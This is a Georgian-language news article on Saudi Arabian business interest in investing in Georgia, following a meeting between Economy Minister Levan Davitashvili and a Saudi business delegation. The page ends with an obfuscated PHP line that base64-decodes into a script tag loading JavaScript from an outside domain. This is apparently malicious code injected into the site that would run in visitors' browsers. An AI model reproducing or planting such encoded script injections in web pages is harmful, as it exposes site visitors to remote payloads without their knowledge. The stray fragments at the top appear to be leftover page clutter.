celsiusi
ავერსი საქკაბელი

 პირველი ვიცე-პრემიერი, ეკონომიკის მინისტრი ლევან დავითაშვილი ამბობს, რომ საუდის არაბეთიდან ძალიან დიდი დაინტერესებაა საქართველოში სხვადასხვა სექტორში ინვესტირების მიმართულებით. მან ამის შესახებ საუდის არაბეთის ბიზნესდელეგაციის წარმომადგენლებთან შეხვედრის შემდეგ განაცხადა.

ეკონომიკის სამინისტროს ინფორმაციით, დავითაშვილის შეფასებით, ბიზნესსაბჭო, რომელიც საქართველოსა და საუდის არაბეთის მთავრობების გადაწყვეტილებით ჩამოყალიბდა, ძალიან მნიშვნელოვანი პლატფორმაა ეკონომიკური ურთიერთობების წახალისებისთვის.

"მათთვის ძალიან შთამბეჭდავია ის ეკონომიკური პროგრესი, სტაბილური ვითარება და პროგნოზირებადობა, რომლებიც ბოლო წლებში ჩვენ ქვეყანას გააჩნია, შესაბამისად, ვისაუბრეთ კონკრეტულ პროექტებზე, რომლებიც შეეხება ინვესტირებას სატრანსპორტო-ლოგისტიკურ სფეროში, ასევე უძრავი ქონების, სტუმარმასპინძლობის, ნავთობისა და გაზის აღმოჩენების, ენერგეტიკის მიმართულებით.

განსაკუთრებით მნიშვნელოვანია ორ ქვეყანას შორის სავაჭრო და საინვესტიციო მიმართულებით თანამშრომლობა. კონკრეტულ ბიზნესებთან ვისაუბრეთ საქართველოში საინვესტიციო შესაძლებლობებზე და ვფიქრობ, ამ ინვესტიციების განხორციელებით შესაძლებელია დამატებითი უცხოური ინვესტიციების მოზიდვა და დამატებითი ბიზნესშესაძლებლობების გაჩენა“,- აღნიშნა ეკონომიკის მინისტრმა.

სამინისტროს ინფორმაციით, ლევან დავითაშვილთან შეხვედრამდე საქართველო-საუდის არაბეთის ერთობლივი ბიზნესსაბჭოს სხდომა, ასევე ბიზნესფორუმი გაიმართა, რომელშიც მონაწილეობა მიიღეს ორი ქვეყნის საქმიანი წრეების წარმომადგენლებმა ვაჭრობის, ლოგისტიკის, ენერგეტიკის, უძრავი ქონების, ტურიზმის, ტრანსპორტის, IT ტექნოლოგიების, მედიცინის, მშენებლობის და სხვა სექტორებიდან. ბიზნესფორუმის ფარგლებში Medical Bridge-ს, Polymer Solution-სა და Gulf Pharma-ს შორის ურთიერთგაგების მემორანდუმი გაფორმდა, რომელთა შედეგად საქართველოში ორმოცდაათ მილიონზე მეტი ევროს ინვესტიცია განხორციელდება. ორმხრივ ბიზნესფორუმში 70-მდე საუდელი ბიზნესმენი მონაწილეობდა.

70
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");